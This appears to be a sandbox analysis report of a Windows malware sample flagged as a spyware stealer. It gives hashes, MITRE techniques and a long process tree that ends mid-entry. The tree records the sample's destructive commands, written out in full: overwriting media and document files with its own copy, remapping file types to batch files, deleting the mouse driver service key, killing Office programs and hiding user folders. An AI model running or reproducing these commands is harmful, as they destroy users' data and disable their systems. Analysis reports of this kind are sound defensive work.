33702a5d170df9fa0d162b718bd66e6be775c891c832fe2582d065b4b390f52c

Analysis

max time kernel
7s
max time network
125s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
22/12/2023, 16:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f774f78db788298bf7d2c202e8191982.exe
Size

894KB
MD5

f774f78db788298bf7d2c202e8191982
SHA1

aedbf7cebb06ceaf1bfadeb0b0d120dd5d896ee4
SHA256

33702a5d170df9fa0d162b718bd66e6be775c891c832fe2582d065b4b390f52c
SHA512

c1dfdb37dd0e597b8daf7049641f671570b5c25474bd6d299d81d2878ce6a85e856c2395a59c56d23f6f324ef0acc4c3c4633ede8b7a30ab29906bac50f4baac
SSDEEP

6144:btzsb5Uh28+V1WW69B9VjMdxPedN9ug0z9TB9SToSX/qlJqCjvPEXtobaJsmLU9S:btzE5elwLz9Trs/CjvPEXusLHCgW+/Jd

Score

7^/10

spyware stealer

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\Maid with the Flaxen Hair.mp3	conhost.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\Maid with the Flaxen Hair.mp3	conhost.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\Sleep Away.mp3	conhost.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\Sleep Away.mp3	conhost.exe
File opened for modification	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\Kalimba.mp3	conhost.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-musicsamples_31bf3856ad364e35_6.1.7600.16385_none_06495209cbd8e93b\Kalimba.mp3	conhost.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp3	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile"	cmd.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2784 wrote to memory of 2996	2784	f774f78db788298bf7d2c202e8191982.exe	17
PID 2784 wrote to memory of 2996	2784	f774f78db788298bf7d2c202e8191982.exe	17
PID 2784 wrote to memory of 2996	2784	f774f78db788298bf7d2c202e8191982.exe	17
PID 2996 wrote to memory of 2640	2996	cmd.exe	32
PID 2996 wrote to memory of 2640	2996	cmd.exe	32
PID 2996 wrote to memory of 2640	2996	cmd.exe	32
PID 2996 wrote to memory of 1168	2996	cmd.exe	1310
PID 2996 wrote to memory of 1168	2996	cmd.exe	1310
PID 2996 wrote to memory of 1168	2996	cmd.exe	1310

Views/modifies file attributes 1 TTPs 45 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
7408	attrib.exe
11744	Process not Found
19676	Process not Found
19800	Process not Found
13280	Process not Found
1836	attrib.exe
6292	attrib.exe
8964	attrib.exe
8912	attrib.exe
9756	attrib.exe
13540	Process not Found
18524	Process not Found
1640	attrib.exe
2168	attrib.exe
2964	attrib.exe
2708	attrib.exe
9888	attrib.exe
17296	Process not Found
6508	attrib.exe
1692	attrib.exe
1656	attrib.exe
8096	attrib.exe
17840	Process not Found
5808	attrib.exe
2596	attrib.exe
6912	attrib.exe
13308	Process not Found
19304	Process not Found
5732	attrib.exe
2632	attrib.exe
8536	attrib.exe
11220	Process not Found
20676	Process not Found
2008	attrib.exe
18320	Process not Found
19512	Process not Found
17836	Process not Found
20752	Process not Found
2164	attrib.exe
1576	attrib.exe
10008	attrib.exe
9712	attrib.exe
972	attrib.exe
2572	attrib.exe
9132	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
"C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5DA.tmp\5EB.tmp\5EC.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1192
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:2696
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:2816
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:1308
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:2716
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DD47.tmp\DD46.tmp\DD47.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
      4⤵
      PID:9620
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1640

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1584
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5FFB.tmp\5FFC.tmp\5FFD.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5828
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:6508
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:6676
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:6432
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:2484

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1588
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6193.tmp\622D.tmp\622E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3000

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2184
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6039.tmp\603A.tmp\603B.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6768
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6980
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6884
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6344
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6148
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:5864
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6072
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:5352
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6268
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:6460
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7244
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7412
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7348
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:768
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:2712
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:2624
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2644
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D569.tmp\D579.tmp\D57A.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
      4⤵
      PID:8656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2256

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1980
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5FEB.tmp\5FEC.tmp\5FED.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8204
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:8964
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:9868

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1780
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61A0.tmp\622D.tmp\622E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1580

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1204
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6104.tmp\6105.tmp\6106.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5396
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:5732
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:6068
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:5444
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:6056
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2648
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C958.tmp\C958.tmp\C959.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
      4⤵
      PID:6732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:2064

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:320
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6105.tmp\6105.tmp\6106.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1060
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:3660
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:4108
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:8104
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:4892
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:4736
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:1080

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:544
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6191.tmp\61D0.tmp\61D1.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1772

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:596
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6192.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:1916

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:844
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6106.tmp\6105.tmp\6106.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3008
- - C:\Windows\system32\tskill.exe
    tskill WINWORD
    3⤵
    PID:3632
- - C:\Windows\system32\tskill.exe
    tskill excel
    3⤵
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K crash.bat
    3⤵
    PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
      4⤵
      PID:7408
- - C:\Windows\system32\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    3⤵
    PID:4572
- - C:\Windows\system32\tskill.exe
    tskill msaccess
    3⤵
    PID:4924
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:2804
- - C:\Windows\system32\cmd.exe
